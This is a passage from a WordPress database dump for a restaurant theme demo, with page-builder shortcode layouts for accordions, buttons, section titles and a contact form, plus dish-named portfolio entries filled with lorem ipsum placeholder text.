quo tollit legendos. [mkdf_highlight background_color=\"#a1a1a1\" color=\"#fff\"]Est habeo gubergren et, noluisse persecuti id sit.No dicit ceteros duo. Usu tractatos repudiandae cu , ei has nulla verear eligendi. Nam persius epicurei ut, causae suscipiantur ex qui, nominavi adolescens eos in. Idvixsen congue noster possit, no sea abhorreant mnesarchum. Civibus prodesset et mel, ut vix invidunt qualisque, sed fringilla mauris justo et netu suisde. [/mkdf_highlight]Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus.Sed fringilla mauris sit amet nibh.[/vc_column_text][/vc_column][/vc_row]','Highlights','','publish','closed','closed','','highlights','','','2018-08-14 13:51:24','2018-08-14 13:51:24','',3039,'http://attika.mikado-themes.com/?page_id=1250',0,'page','',0),(3071,1,'2018-08-14 14:56:12','2018-08-14 14:56:12','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534336937178{padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_accordion][mkdf_accordion_tab title=\"Customer Connections\"][vc_column_text]Aenean sollicitudin, tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Evolving with our Business.\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin, tellus vitae condimentum egestas. Libero varius ligula a id nec libero amet non metus ligula risus egestas.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Next Generation Leadership.\"][vc_column_text]Ut usu paulo tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel.[/vc_column_text][/mkdf_accordion_tab][/mkdf_accordion][vc_empty_space height=\"70px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_accordion][mkdf_accordion_tab title=\"Customer Connections\"][vc_column_text]Aenean sollicitudin, tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Evolving with our Business.\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin, tellus vitae condimentum egestas. Libero varius ligula a id nec libero amet non metus ligula risus egestas.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Next Generation Leadership.\"][vc_column_text]Ut usu paulo tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel.[/vc_column_text][/mkdf_accordion_tab][/mkdf_accordion][vc_empty_space height=\"70px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_accordion layout=\"simple\"][mkdf_accordion_tab title=\"Customer Connections.\"][vc_column_text]Ut usu paulo tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel, eu vis idque principes definitionem. Melius alienum forensibus eum an. Cu homero nullam intellegebat his.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Evolving with our Business.\"][vc_column_text]Lorem ipsum dolor sit amet, ornatus constituto sitne, ne falli dictas sit id vagam illum pertinacia estcu. Porro detraxit eum in. Nec dico illum solet ei, tritani apeirian eam id, sitcu labore lobortis. Integre percipitur sit id, qui eruditi salutandi imperdiet an. An eam cibo tempor euripidis.[/vc_column_text][/mkdf_accordion_tab][mkdf_accordion_tab title=\"Next Generation Leadership.\"][vc_column_text]Ut usu paulo tibique detraxit, vim vero docendi Ut usu paulo tibique detraxit, vim vero docendi reformidans cu. Eius maiorum apeirian vix at, te aeque iudico adversarium vel, eu vis idque principes definitionem. Melius alienum forensibus eum an. Cu homero nullam intellegebat his.[/vc_column_text][/mkdf_accordion_tab][/mkdf_accordion][/vc_column][/vc_row]','Accordions','','publish','closed','closed','','accordions','','','2018-08-14 14:56:12','2018-08-14 14:56:12','',3039,'http://attika.mikado-themes.com/?page_id=1297',0,'page','',0),(3072,1,'2018-08-14 15:14:32','2018-08-14 15:14:32','[vc_row row_content_width=\"grid\"][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972196196{padding-bottom: 11px !important;}\"]\n<h4>Simple</h4>\n[/vc_column_text][vc_column_text]\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n\nLorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.\n\n</div>\n</div>\n[/vc_column_text][vc_empty_space height=\"43px\"][mkdf_button type=\"simple\" text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" enable_icon=\"icon_pack\" link=\"#\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972181946{padding-bottom: 11px !important;}\"]\n<h4>Solid</h4>\n[/vc_column_text][vc_column_text]\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n\nLorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.\n\n</div>\n</div>\n[/vc_column_text][vc_empty_space][mkdf_button text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" link=\"#\" hover_background_color=\"rgba(255,255,255,0.01)\" hover_color=\"#111111\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972188182{padding-bottom: 11px !important;}\"]\n<h4>Outline</h4>\n[/vc_column_text][vc_column_text]\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n\nLorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.\n\n</div>\n</div>\n[/vc_column_text][vc_empty_space][mkdf_button type=\"outline\" text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" link=\"#\" hover_color=\"#ffffff\" hover_background_color=\"#111111\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534260159095{padding-top: 27px !important;}\"][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972203514{padding-bottom: 11px !important;}\"]\n<h4>Small</h4>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.[/vc_column_text][vc_empty_space][mkdf_button type=\"simple\" size=\"small\" text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" enable_icon=\"icon_pack\" link=\"#\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972212180{padding-bottom: 11px !important;}\"]\n<h4>Medium</h4>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.[/vc_column_text][vc_empty_space height=\"34px\"][mkdf_button type=\"simple\" size=\"medium\" text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" enable_icon=\"icon_pack\" link=\"#\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"3/4\" offset=\"vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text css=\".vc_custom_1523972218710{padding-bottom: 11px !important;}\"]\n<h4>Large</h4>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing rhoncus elit. Aenean commodo ligula dolor aenean massa cum sociis.[/vc_column_text][vc_empty_space height=\"35px\"][mkdf_button type=\"simple\" size=\"large\" text=\"View More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"uppercase\" enable_icon=\"icon_pack\" link=\"#\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Buttons','','publish','closed','closed','','buttons','','','2018-08-14 15:14:32','2018-08-14 15:14:32','',3039,'http://attika.mikado-themes.com/?page_id=1310',0,'page','',0),(3073,1,'2018-08-21 09:47:11','2018-08-21 09:47:11','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"15px 0 -10px 50%\" line_length=\"45px\" title=\"Reservation\"][/mkdf_section_title][contact-form-7 id=\"831\"][/vc_column][/vc_row]','Contact Form','','publish','closed','closed','','contact-form','','','2018-08-21 09:47:11','2018-08-21 09:47:11','',3039,'http://attika.mikado-themes.com/?page_id=1759',0,'page','',0),(3074,1,'2018-08-22 08:00:11','2018-08-22 08:00:11','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column width=\"1/3\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Follow us on instagram\" line_length=\"0px\" title_break_words=\"1,3\"][/mkdf_section_title][/vc_column][vc_column width=\"1/3\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"h3\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Fine dining restaurant\" text=\"Rainbow Ridge Dr street 35\nNY City, NY\" line_length=\"0px\" text_margin=\"18\" title_break_words=\"1,2,3\"]Rainbow Ridge Dr street 35\nNY City, NY[/mkdf_section_title][/vc_column][vc_column width=\"1/3\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Dessert\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1534926481959{padding-top: 4px !important;}\"]Mint Parfait\n(ice cream, white chocolate mousse\nand spices)[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" title=\"BOOK YOUR PRIVATE &amp; BUSINESS DINING\" title_break_words=\"1,2,4,5\" line_length=\"0px\" text_margin=\"23\" text_right_padding=\"120px\"]Lorem ipsum proin gravida velit auctor aliquet. Aenean sollicitu din, lorem auci elit consequat enim justo niuis sed odio sit ameta sit amet. Etiam ultricies nisi vel.[/mkdf_section_title][vc_empty_space height=\"50px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" title=\"CHEF’ WORDS\" title_break_words=\"1\" line_length=\"120px\" text_margin=\"40\" line_margin=\"50px 9% 0 14%\" text_right_padding=\"75px\"]Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor augue sapien.[/mkdf_section_title][vc_empty_space height=\"50px\"][/vc_column][/vc_row]','Section Title','','publish','closed','closed','','section-title','','','2018-08-22 08:00:11','2018-08-22 08:00:11','',3039,'http://attika.mikado-themes.com/?page_id=1904',0,'page','',0),(3075,1,'2018-07-31 08:07:33','2018-07-31 08:07:33','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Seasoning Time','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','seasoning-time','','','2018-07-31 08:07:33','2018-07-31 08:07:33','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=104',0,'portfolio-item','',0),(3076,1,'2018-07-31 08:13:37','2018-07-31 08:13:37','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Italian Kiss','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','italian-kiss','','','2018-07-31 08:13:37','2018-07-31 08:13:37','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=136',0,'portfolio-item','',0),(3077,1,'2018-07-31 08:16:21','2018-07-31 08:16:21','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','A Taste of Heaven','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','a-taste-of-heaven','','','2018-07-31 08:16:21','2018-07-31 08:16:21','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=141',0,'portfolio-item','',0),(3078,1,'2018-08-06 12:55:34','2018-08-06 12:55:34','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','Sweet Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','sweet-dream','','','2018-08-06 12:55:34','2018-08-06 12:55:34','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=568',0,'portfolio-item','',0),(3079,1,'2018-08-06 13:45:19','2018-08-06 13:45:19','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Vitamin Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','vitamin-salad','','','2018-08-06 13:45:19','2018-08-06 13:45:19','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=580',0,'portfolio-item','',0),(3080,1,'2018-08-06 14:01:15','2018-08-06 14:01:15','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Cold Fruit','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','cold-fruit','','','2018-08-06 14:01:15','2018-08-06 14:01:15','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=583',0,'portfolio-item','',0),(3081,1,'2018-08-06 14:10:39','2018-08-06 14:10:39','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Floating Islands','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','floating-islands','','','2018-08-06 14:10:39','2018-08-06 14:10:39','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=588',0,'portfolio-item','',0),(3082,1,'2018-08-06 14:14:38','2018-08-06 14:14:38','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Ice Cream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','ice-cream','','','2018-08-06 14:14:38','2018-08-06 14:14:38','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=590',0,'portfolio-item','',0),(3083,1,'2018-08-06 14:18:22','2018-08-06 14:18:22','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Grilled Vegetables','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','grilled-vegetables','','','2018-08-06 14:18:22','2018-08-06 14:18:22','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=592',0,'portfolio-item','',0),(3084,1,'2018-08-07 10:32:16','2018-08-07 10:32:16','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Green Soup','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','green-soup','','','2018-08-07 10:32:16','2018-08-07 10:32:16','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=634',0,'portfolio-item','',0),(3085,1,'2018-08-07 10:37:00','2018-08-07 10:37:00','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','The fresh pâté','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','the-fresh-pate','','','2018-08-07 10:37:00','2018-08-07 10:37:00','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=640',0,'portfolio-item','',0),(3086,1,'2018-08-07 10:39:09','2018-08-07 10:39:09','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','Peach sorbet','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','peach-sorbet','','','2018-08-07 10:39:09','2018-08-07 10:39:09','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=644',0,'portfolio-item','',0),(3087,1,'2018-08-07 10:39:50','2018-08-07 10:39:50','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Season To Taste','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','season-to-taste','','','2018-08-07 10:39:50','2018-08-07 10:39:50','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=645',0,'portfolio-item','',0),(3088,1,'2018-08-07 10:44:07','2018-08-07 10:44:07','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Tuna Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio 